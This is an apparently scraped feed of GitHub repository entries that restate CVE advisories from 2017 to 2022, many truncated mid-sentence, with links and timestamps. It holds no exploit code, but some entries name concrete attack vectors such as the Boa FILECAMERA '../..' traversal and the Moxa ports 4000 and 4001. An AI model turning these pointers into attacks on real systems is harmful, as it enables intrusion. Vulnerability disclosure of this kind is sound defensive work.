**** DISPUTED ** /cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wap CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9833](https://github.com/Live-Hack-CVE/CVE-2017-9833) create time: 2022-12-27T21:46:37Z

**Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4001/tcp to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14439](https://github.com/Live-Hack-CVE/CVE-2017-14439) create time: 2022-12-27T21:42:48Z

**Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14438](https://github.com/Live-Hack-CVE/CVE-2017-14438) create time: 2022-12-27T21:42:37Z

**aacplusenc.c in HE-AAC+ Codec (aka libaacplus) 2.0.2 has an assertion failure, which might allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted audio file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7605](https://github.com/Live-Hack-CVE/CVE-2017-7605) create time: 2022-12-27T21:42:33Z

**IBM Security Directory Server 6.4.0 does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system. IBM X-Force ID: 165812. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4539](https://github.com/Live-Hack-CVE/CVE-2019-4539) create time: 2022-12-27T21:48:32Z

**IBM Jazz Reporting Service (JRS) 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, and 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted sess CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4495](https://github.com/Live-Hack-CVE/CVE-2019-4495) create time: 2022-12-27T21:48:25Z

**IBM Security Directory Server 6.4.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 165815. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4542](https://github.com/Live-Hack-CVE/CVE-2019-4542) create time: 2022-12-27T21:48:22Z

**IBM Security Guardium 9.0, 9.5, and 10.6 are vulnerable to a privilege escalation which could allow an authenticated user to change the accessmgr password. IBM X-Force ID: 162768. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4422](https://github.com/Live-Hack-CVE/CVE-2019-4422) create time: 2022-12-27T21:48:00Z

**IBM Security Directory Server 6.4.0 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 165951. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4549](https://github.com/Live-Hack-CVE/CVE-2019-4549) create time: 2022-12-27T21:47:57Z

**IBM Jazz Reporting Service (JRS) 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, and 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted sess CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4497](https://github.com/Live-Hack-CVE/CVE-2019-4497) create time: 2022-12-27T21:47:53Z

**IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0, and Liberty could allow a remote attacker to obtain sensitive information when a stack trace is returned in the browser. IBM X-Force ID: 163177. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4441](https://github.com/Live-Hack-CVE/CVE-2019-4441) create time: 2022-12-27T21:47:43Z

**IBM Security Key Lifecycle Manager 2.6, 2.7, 3.0, and 3.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4564](https://github.com/Live-Hack-CVE/CVE-2019-4564) create time: 2022-12-27T21:47:39Z

**A heap-based buffer overflow in the vrend_renderer_transfer_write_iov function in vrend_renderer.c in virglrenderer through 0.8.0 allows guest OS users to cause a denial of service via VIRGL_CCMD_RESOURCE_INLINE_WRITE commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18391](https://github.com/Live-Hack-CVE/CVE-2019-18391) create time: 2022-12-27T21:47:19Z

**A heap-based buffer overflow in the vrend_renderer_transfer_write_iov function in vrend_renderer.c in virglrenderer through 0.8.0 allows guest OS users to cause a denial of service, or QEMU guest-to-host escape and code execution, via VIRGL_CCMD_RESOURCE_INLINE_WRITE commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18389](https://github.com/Live-Hack-CVE/CVE-2019-18389) create time: 2022-12-27T21:47:16Z

**A NULL pointer dereference in vrend_renderer.c in virglrenderer through 0.8.0 allows guest OS users to cause a denial of service via malformed commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18388](https://github.com/Live-Hack-CVE/CVE-2019-18388) create time: 2022-12-27T21:47:02Z

**An out-of-bounds read in the vrend_blit_need_swizzle function in vrend_renderer.c in virglrenderer through 0.8.0 allows guest OS users to cause a denial of service via VIRGL_CCMD_BLIT commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18390](https://github.com/Live-Hack-CVE/CVE-2019-18390) create time: 2022-12-27T21:46:54Z

**IBM Security Key Lifecycle Manager 3.0 and 3.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 165137. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4515](https://github.com/Live-Hack-CVE/CVE-2019-4515) create time: 2022-12-27T21:46:40Z

**IBM Security Key Lifecycle Manager 3.0 and 3.0.1 stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 166627. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4566](https://github.com/Live-Hack-CVE/CVE-2019-4566) create time: 2022-12-27T21:46:30Z

**IBM Content Navigator 3.0CD is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 166721. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4571](https://github.com/Live-Hack-CVE/CVE-2019-4571) create time: 2022-12-27T21:46:16Z

**IBM Sterling File Gateway 2.2.0.0 through 6.0.1.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 162769. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4423](https://github.com/Live-Hack-CVE/CVE-2019-4423) create time: 2022-12-27T21:46:12Z

**IBM Jazz Reporting Service (JRS) 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, and 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted sess CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4494](https://github.com/Live-Hack-CVE/CVE-2019-4494) create time: 2022-12-27T21:46:09Z

**IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a user with access to audit logs to obtain sensitive information, caused by improper handling of command line options. IBM X-Force ID: 163997. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4477](https://github.com/Live-Hack-CVE/CVE-2019-4477) create time: 2022-12-27T21:46:05Z

**IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 Network Deployment could allow a remote attacker to obtain sensitive information, caused by sending a specially-crafted URL. This can lead the attacker to view any file in a certain directory. IBM X-Force ID: 164364. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4505](https://github.com/Live-Hack-CVE/CVE-2019-4505) create time: 2022-12-27T21:46:02Z

**IBM Security Key Lifecycle Manager 3.0 and 3.0.1 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 166626. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4565](https://github.com/Live-Hack-CVE/CVE-2019-4565) create time: 2022-12-27T21:45:58Z

**IBM Security Key Lifecycle Manager 2.6, 2.7, 3.0, and 3.0.1 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 165136. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4514](https://github.com/Live-Hack-CVE/CVE-2019-4514) create time: 2022-12-27T21:45:55Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2938](https://github.com/Live-Hack-CVE/CVE-2019-2938) create time: 2022-12-27T21:44:40Z

**Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 allow any user to obtain the presentation passcode via the iso.3.6.1.4.1.3212.100.3.2.7.4 OIDs. A remote, unauthenticated attacker can use this vulnerability to access a restricted presentation or to become the presenter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3928](https://github.com/Live-Hack-CVE/CVE-2019-3928) create time: 2022-12-27T21:37:21Z

**The web-management application on Seagate Central NAS STCG2000300, STCG3000300, and STCG4000300 devices allows OS command injection via mv_backend_launch in cirrus/application/helpers/mv_backend_helper.php by leveraging the "start" state and sending a check_device_name request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6627](https://github.com/Live-Hack-CVE/CVE-2020-6627) create time: 2022-12-27T21:48:18Z

**A NULL pointer dereference in vrend_renderer.c in virglrenderer through 0.8.1 allows attackers to cause a denial of service via commands that attempt to launch a grid without previously providing a Compute Shader (CS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8002](https://github.com/Live-Hack-CVE/CVE-2020-8002) create time: 2022-12-27T21:46:58Z

**A double-free vulnerability in vrend_renderer.c in virglrenderer through 0.8.1 allows attackers to cause a denial of service by triggering texture allocation failure, because vrend_renderer_resource_allocated_texture is not an appropriate place for a free. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8003](https://github.com/Live-Hack-CVE/CVE-2020-8003) create time: 2022-12-27T21:46:51Z

**A flaw was found in dnsmasq before version 2.83. When getting a reply from a forwarded query, dnsmasq checks in forward.c:reply_query(), which is the forwarded query that matches the reply, by only using a weak hash of the query name. Due to the weak hash (CRC32 when dnsmasq is compiled without DNSSEC, SHA-1 when it is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25685](https://github.com/Live-Hack-CVE/CVE-2020-25685) create time: 2022-12-27T21:44:34Z

**A UNIX Symbolic Link (Symlink) Following vulnerability in chkstat of SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Server 15, SUSE Linux Enterprise Server 11 set permissions intended for specific binaries on other binaries because it erroneously followed symlinks. The symlinks can't be controlled by attackers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8013](https://github.com/Live-Hack-CVE/CVE-2020-8013) create time: 2022-12-27T21:44:30Z

**An issue was discovered in Xen through 4.14.x. The PCI passthrough code improperly uses register data. Code paths in Xen's MSI handling have been identified that act on unsanitized values read back from device hardware registers. While devices strictly compliant with PCI specifications shouldn't be able to affect these CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25595](https://github.com/Live-Hack-CVE/CVE-2020-25595) create time: 2022-12-27T21:44:23Z

**In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14321](https://github.com/Live-Hack-CVE/CVE-2020-14321) create time: 2022-12-27T21:44:05Z

**A flaw was found where the Plaintext Candlepin password is disclosed while updating Red Hat Satellite through the satellite-installer. This flaw allows an attacker with sufficiently high privileges, such as root, to retrieve the Candlepin plaintext password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10710](https://github.com/Live-Hack-CVE/CVE-2020-10710) create time: 2022-12-27T21:43:54Z

**jsoup is a Java library for working with HTML. Those using jsoup versions prior to 1.14.2 to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37714](https://github.com/Live-Hack-CVE/CVE-2021-37714) create time: 2022-12-27T21:47:26Z

**An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35940](https://github.com/Live-Hack-CVE/CVE-2021-35940) create time: 2022-12-27T21:47:23Z

**** DISPUTED ** Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33558](https://github.com/Live-Hack-CVE/CVE-2021-33558) create time: 2022-12-27T21:46:33Z

**The Language Bar Flags WordPress plugin through 1.0.8 does not have any CSRF in place when saving its settings and did not sanitise or escape them when generating the flag bar in the frontend. This could allow attackers to make a logged in admin change the settings, and set Cross-Site Scripting payload in them, which w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24431](https://github.com/Live-Hack-CVE/CVE-2021-24431) create time: 2022-12-27T21:45:51Z

**vim is vulnerable to Heap-based Buffer Overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3770](https://github.com/Live-Hack-CVE/CVE-2021-3770) create time: 2022-12-27T21:45:46Z

**Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Client. Succes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2007](https://github.com/Live-Hack-CVE/CVE-2021-2007) create time: 2022-12-27T21:44:44Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.33 and prior and 8.0.23 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2174](https://github.com/Live-Hack-CVE/CVE-2021-2174) create time: 2022-12-27T21:44:37Z

**Heap buffer overflow in Clickhouse's LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43304](https://github.com/Live-Hack-CVE/CVE-2021-43304) create time: 2022-12-27T21:44:12Z

**Heap out-of-bounds read in Clickhouse's LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value ('offset') is read from the compressed data. The offset is later used in the length of a copy operation, without checking the lower bounds of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42388](https://github.com/Live-Hack-CVE/CVE-2021-42388) create time: 2022-12-27T21:44:01Z

**Heap buffer overflow in Clickhouse's LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. This issue is ve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43305](https://github.com/Live-Hack-CVE/CVE-2021-43305) create time: 2022-12-27T21:43:50Z

**In BIND 9.3.0 -> 9.11.35, 9.12.0 -> 9.16.21, and versions 9.9.3-S1 -> 9.11.35-S1 and 9.16.8-S1 -> 9.16.21-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.18 of the BIND 9.17 development branch, exploitation of broken authoritative servers using a flaw in response processing can cause de CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25219](https://github.com/Live-Hack-CVE/CVE-2021-25219) create time: 2022-12-27T21:43:31Z

**A vulnerability was found in the fs/inode.c:inode_init_owner() function logic of the LInux kernel that allows local users to create files for the XFS file-system with an unintended group ownership and with group execution and SGID permission bits set, in a scenario where a directory is SGID and belongs to a certain gro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4037](https://github.com/Live-Hack-CVE/CVE-2021-4037) create time: 2022-12-27T21:43:10Z

**A flaw was found in Python, specifically in the FTP (File Transfer Protocol) client library in PASV (passive) mode. The issue is how the FTP client trusts the host from the PASV response by default. This flaw allows an attacker to set up a malicious FTP server that can trick FTP clients into connecting back to a given CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4189](https://github.com/Live-Hack-CVE/CVE-2021-4189) create time: 2022-12-27T21:42:29Z

**A default username and password for an administrator account was discovered in ZKTeco ZKTime 10.0 through 11.1.0, builds 20180901, 20190510.1, 20200309.3, 20200930, 20201231, and 20210220. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39434](https://github.com/Live-Hack-CVE/CVE-2021-39434) create time: 2022-12-27T21:38:46Z

**A vulnerability has been identified in SIMATIC CP 1543-1 (incl. SIPLUS variants) (All versions < V3.0), SIMATIC CP 1545-1 (All versions < V1.1). An attacker with access to the subnet of the affected device could retrieve sensitive information stored in cleartext. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33716](https://github.com/Live-Hack-CVE/CVE-2021-33716) create time: 2022-12-27T21:37:14Z

**Unauth. Stored Cross-Site Scripting (XSS) vulnerability in Contest Gallery plugin <= 13.1.0.9 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45848](https://github.com/Live-Hack-CVE/CVE-2022-45848) create time: 2022-12-27T21:48:29Z

**Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Xylus Themes WP Smart Import plugin <= 1.0.2 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40209](https://github.com/Live-Hack-CVE/CVE-2022-40209) create time: 2022-12-27T21:47:50Z

**A vulnerability was found in FastCMS. It has been rated as critical. This issue affects some unknown processing of the file /template/edit of the component Template Handler. The manipulation leads to injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The ident CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4300](https://github.com/Live-Hack-CVE/CVE-2022-4300) create time: 2022-12-27T21:47:36Z

**A vulnerability classified as problematic has been found in TP-Link TL-WR740N. Affected is an unknown function of the component ARP Handler. The manipulation leads to resource consumption. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. The identifier CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4296](https://github.com/Live-Hack-CVE/CVE-2022-4296) create time: 2022-12-27T21:47:33Z

**Auth. Stored Cross-Site Scripting (XSS) vulnerability in GD bbPress Attachments plugin <= 4.3.1 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45816](https://github.com/Live-Hack-CVE/CVE-2022-45816) create time: 2022-12-27T21:47:29Z

**An out-of-bounds write issue was found in the VirGL virtual OpenGL renderer (virglrenderer). This flaw allows a malicious guest to create a specially crafted virgil resource and then issue a VIRTGPU_EXECBUFFER ioctl, leading to a denial of service or possible code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0135](https://github.com/Live-Hack-CVE/CVE-2022-0135) create time: 2022-12-27T21:46:47Z

**UC-8100A-ME-T System Image: Versions v1.0 to v1.6, UC-2100 System Image: Versions v1.0 to v1.12, UC-2100-W System Image: Versions v1.0 to v 1.12,&nbsp;UC-3100 System Image: Versions v1.0 to v1.6,&nbsp;UC-5100 System Image: Versions v1.0 to v1.4, UC-8100 System Image: Versions v3.0 to v3.5, UC-8100-ME-T System Image: Ve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3088](https://github.com/Live-Hack-CVE/CVE-2022-3088) create time: 2022-12-27T21:46:43Z

**A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3 allows a privileged attacker to execute unauthorized code or commands via storing malicious payloads in replacement messages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40680](https://github.com/Live-Hack-CVE/CVE-2022-40680) create time: 2022-12-27T21:45:42Z

**Improper neutralization of input during web page generation [CWE-79] in FortiSOAR 7.0.0 through 7.0.3 and 7.2.0 may allow an authenticated attacker to inject HTML tags via input fields of various components within FortiSOAR. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38379](https://github.com/Live-Hack-CVE/CVE-2022-38379) create time: 2022-12-27T21:45:09Z

**Multiple instances of improper input validation vulnerability in Fortinet FortiADC version 7.1.0, version 7.0.0 through 7.0.2 and version 6.2.4 and below allows an authenticated attacker to retrieve files with specific extension from the underlying Linux system via crafted HTTP requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33876](https://github.com/Live-Hack-CVE/CVE-2022-33876) create time: 2022-12-27T21:45:06Z

**AyaCMS v3.1.2 has an Arbitrary File Upload vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45548](https://github.com/Live-Hack-CVE/CVE-2022-45548) create time: 2022-12-27T21:45:02Z

**Unauth. Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards premium plugin <= 3.19.0 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45359](https://github.com/Live-Hack-CVE/CVE-2022-45359) create time: 2022-12-27T21:44:58Z

**Cradlepoint IBR600 NCOS versions 6.5.0.160bc2e and prior are vulnerable to shell escape, which enables local attackers with non-superuser credentials to gain full, unrestrictive shell access which may allow an attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3086](https://github.com/Live-Hack-CVE/CVE-2022-3086) create time: 2022-12-27T21:44:55Z

**TensorFlow is an open source platform for machine learning. The function MakeGrapplerFunctionItem takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read or a crash is triggered. We have patched the issue in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41902](https://github.com/Live-Hack-CVE/CVE-2022-41902) create time: 2022-12-27T21:44:52Z

**TensorFlow is an open source platform for machine learning. The function MakeGrapplerFunctionItem takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read or a crash is triggered. We have patched the issue in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41910](https://github.com/Live-Hack-CVE/CVE-2022-41910) create time: 2022-12-27T21:44:48Z

**LoRaMac-node is a reference implementation and documentation of a LoRa network node. Versions of LoRaMac-node prior to 4.7.0 are vulnerable to a buffer overflow. Improper size validation of the incoming radio frames can lead to an 65280-byte out-of-bounds write. The function `ProcessRadioRxDone` implicitly expects inco CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39274](https://github.com/Live-Hack-CVE/CVE-2022-39274) create time: 2022-12-27T21:44:26Z

**Matrix Javascript SDK is the Matrix Client-Server SDK for JavaScript. Prior to version 19.7.0, an attacker cooperating with a malicious homeserver can construct messages appearing to have come from another person. Such messages will be marked with a grey shield on some platforms, but this may be missing in others. This CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39249](https://github.com/Live-Hack-CVE/CVE-2022-39249) create time: 2022-12-27T21:44:19Z

**Matrix Javascript SDK is the Matrix Client-Server SDK for JavaScript. Starting with version 17.1.0-rc.1, improperly formed beacon events can disrupt or impede the matrix-js-sdk from functioning properly, potentially impacting the consumer's ability to process data safely. Note that the matrix-js-sdk can appear to be op CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39236](https://github.com/Live-Hack-CVE/CVE-2022-39236) create time: 2022-12-27T21:44:15Z

**Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33980](https://github.com/Live-Hack-CVE/CVE-2022-33980) create time: 2022-12-27T21:44:08Z

**A memory corruption vulnerability exists in the httpd unescape functionality of FreshTomato 2022.1. A specially-crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability.The `freshtomato-arm` has a vulnerable URL-decoding feature that can lead to memory cor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28665](https://github.com/Live-Hack-CVE/CVE-2022-28665) create time: 2022-12-27T21:43:58Z

**A memory corruption vulnerability exists in the httpd unescape functionality of FreshTomato 2022.1. A specially-crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability.The `freshtomato-mips` has a vulnerable URL-decoding feature that can lead to memory co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28664](https://github.com/Live-Hack-CVE/CVE-2022-28664) create time: 2022-12-27T21:43:45Z

**An issue was discovered in certain Verbatim drives through 2022-03-31. Due to an insecure design, they allow an offline brute-force attack for determining the correct passcode, and thus gaining unauthorized access to the stored encrypted data. This affects Keypad Secure USB 3.2 Gen 1 Drive Part Number #49428 and Store CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28384](https://github.com/Live-Hack-CVE/CVE-2022-28384) create time: 2022-12-27T21:43:42Z

**A logic issue was addressed with improved state management. This issue is fixed in Safari 16, iOS 16, iOS 15.7 and iPadOS 15.7. A website may be able to track users through Safari web extensions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32868](https://github.com/Live-Hack-CVE/CVE-2022-32868) create time: 2022-12-27T21:43:38Z

**P2M pool freeing may take excessively long The P2M pool backing second level address translation for guests may be of significant size. Therefore its freeing may take more time than is reasonable without intermediate preemption checks. Such checking for the need to preempt was so far missing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33746](https://github.com/Live-Hack-CVE/CVE-2022-33746) create time: 2022-12-27T21:43:34Z

**A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42890](https://github.com/Live-Hack-CVE/CVE-2022-42890) create time: 2022-12-27T21:43:06Z

**In MariaDB before 10.9.2, compress_write in extra/mariabackup/ds_compress.cc does not release data_mutex upon a stream write failure, which allows local users to trigger a deadlock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38791](https://github.com/Live-Hack-CVE/CVE-2022-38791) create time: 2022-12-27T21:43:02Z

**In GNU Binutils before 2.40, there is a heap-buffer-overflow in the error function bfd_getl32 when called from the strip_main function in strip-new via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38533](https://github.com/Live-Hack-CVE/CVE-2022-38533) create time: 2022-12-27T21:42:59Z

**jsoup is a Java HTML parser, built for HTML editing, cleaning, scraping, and cross-site scripting (XSS) safety. jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow XSS attacks when a reader subsequently clicks that link. If the non-default `SafeList.preserveRelativeLinks` opti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36033](https://github.com/Live-Hack-CVE/CVE-2022-36033) create time: 2022-12-27T21:42:55Z

**An issue was discovered in the GNU C Library (glibc) 2.36. When the syslog function is passed a crafted input string larger than 1024 bytes, it reads uninitialized memory from the heap and prints it to the target log file, potentially revealing a portion of the contents of the heap. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39046](https://github.com/Live-Hack-CVE/CVE-2022-39046) create time: 2022-12-27T21:42:51Z

**A flaw was found in PostgreSQL. There is an issue with incomplete efforts to operate safely when a privileged user is maintaining another user's objects. The Autovacuum, REINDEX, CREATE INDEX, REFRESH MATERIALIZED VIEW, CLUSTER, and pg_amcheck commands activated relevant protections too late or not at all during the pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1552](https://github.com/Live-Hack-CVE/CVE-2022-1552) create time: 2022-12-27T21:42:44Z

**An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12128](https://github.com/Live-Hack-CVE/CVE-2017-12128) create time: 2022-12-27T20:59:56Z

